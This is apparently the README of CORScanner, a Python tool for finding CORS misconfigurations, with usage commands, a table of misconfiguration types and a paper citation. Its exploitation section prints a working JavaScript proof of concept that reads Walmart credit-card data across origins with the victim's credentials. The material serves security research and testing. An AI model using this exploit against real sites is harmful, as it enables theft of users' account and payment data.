Home

Awesome

About CORScanner

CORScanner is a python tool designed to discover CORS misconfigurations vulnerabilities of websites. It helps website administrators and penetration testers to check whether the domains/urls they are targeting have insecure CORS policies.

Features

Two useful references for understanding CORS systematically:

<details><summary>Please consider citing our paper if you do scentific research (Click me). </summary> <p>

Latex version:

@inproceedings{chen-cors,
author = {Jianjun Chen and Jian Jiang and Haixin Duan and Tao Wan and Shuo Chen and Vern Paxson and Min Yang},
title = {We Still Don{\textquoteright}t Have Secure Cross-Domain Requests: an Empirical Study of {CORS}},
booktitle = {27th {USENIX} Security Symposium ({USENIX} Security 18)},
year = {2018},
isbn = {978-1-939133-04-5},
address = {Baltimore, MD},
pages = {1079--1093},
url = {https://www.usenix.org/conference/usenixsecurity18/presentation/chen-jianjun},
publisher = {{USENIX} Association},
month = aug,
}

Word version:

Jianjun Chen, Jian Jiang, Haixin Duan, Tao Wan, Shuo Chen, Vern Paxson, and Min Yang. "We Still Don’t Have Secure Cross-Domain Requests: an Empirical Study of CORS." In 27th USENIX Security Symposium (USENIX Security 18), pp. 1079-1093. 2018.

</p> </details>

Screenshots

CORScanner

Installation

git clone https://github.com/chenjj/CORScanner.git
sudo pip install -r requirements.txt

CORScanner depends on the requests, gevent, tldextract, colorama and argparse python modules.

Python Version:

CORScanner as a library

sudo pip install corscanner

or use the short name:

sudo pip install cors
>>> from CORScanner.cors_scan import cors_check
>>> ret = cors_check("https://www.instagram.com", None)
>>> ret
{'url': 'https://www.instagram.com', 'type': 'reflect_origin', 'credentials': 'false', 'origin': 'https://evil.com', 'status_code': 200}

You can also use CORScanner via the corscanner or cors command: cors -vu https://www.instagram.com

Usage

Short FormLong FormDescription
-u--urlURL/domain to check it's CORS policy
-d--headersAdd headers to the request
-i--inputURL/domain list file to check their CORS policy
-t--threadsNumber of threads to use for CORS scan
-o--outputSave the results to json file
-v--verboseEnable the verbose mode and display results in realtime
-T--timeoutSet requests timeout (default 10 sec)
-p--proxyEnable proxy (http or socks5)
-h--helpshow the help message and exit

Examples

python cors_scan.py -u example.com

python cors_scan.py -u example.com -v

python cors_scan.py -u example.com -o output_filename

python cors_scan.py -u http://example.com/restapi

python cors_scan.py -u example.com -d "Cookie: test"

python cors_scan.py -i top_100_domains.txt -t 100

python cors_scan.py -u example.com -p http://127.0.0.1:8080

To use socks5 proxy, install PySocks with pip install PySocks

python cors_scan.py -u example.com -p socks5://127.0.0.1:8080

python cors_scan.py -h

Misconfiguration types

This tool covers the following misconfiguration types:

Misconfiguration typeDescription
Reflect_any_originBlindly reflect the Origin header value in Access-Control-Allow-Origin headers in responses, which means any website can read its secrets by sending cross-orign requests.
Prefix_matchwwww.example.com trusts example.com.evil.com, which is an attacker's domain.
Suffix_matchwwww.example.com trusts evilexample.com, which could be registered by an attacker.
Not_escape_dotwwww.example.com trusts wwwaexample.com, which could be registered by an attacker.
Substring matchwwww.example.com trusts example.co, which could be registered by an attacker.
Trust_nullwwww.example.com trusts null, which can be forged by iframe sandbox scripts
HTTPS_trust_HTTPRisky trust dependency, a MITM attacker may steal HTTPS site secrets
Trust_any_subdomainRisky trust dependency, a subdomain XSS may steal its secrets
Custom_third_partiesCustom unsafe third parties origins like github.io, see more in origins.json file. Thanks @phackt!
Special_characters_bypassExploiting browsers’ handling of special characters. Most can only work in Safari except _, which can also work in Chrome and Firefox. See more in Advanced CORS Exploitation Techniques. Thanks @Malayke.

Welcome to contribute more.

Exploitation examples

Here is an example about how to exploit "Reflect_any_origin" misconfiguration on Walmart.com(fixed). Localhost is the malicious website in the video.

Walmart.com video on Youtube:

Walmart_CORS_misconfiguration_exploitation

Here is the exploitation code:

<script>
    // Send a cross origin request to the walmart.com server, when a victim visits the page.
    var req = new XMLHttpRequest();
    req.open('GET',"https://www.walmart.com/account/electrode/account/api/customer/:CID/credit-card",true);
    req.onload = stealData;
    req.withCredentials = true;
    req.send();

    function stealData(){
        //reading response is allowed because of the CORS misconfiguration.
        var data= JSON.stringify(JSON.parse(this.responseText),null,2);

        //display the data on the page. A real attacker can send the data to his server.
        output(data);
    }

    function output(inp) {
        document.body.appendChild(document.createElement('pre')).innerHTML = inp;
    }
</script>

If you have understood how the demo works, you can read Section 5 and Section 6 of the CORS paper and know how to exploit other misconfigurations.

License

CORScanner is licensed under the MIT license. take a look at the LICENSE for more information.

Credits

This work is inspired by the following excellent researches: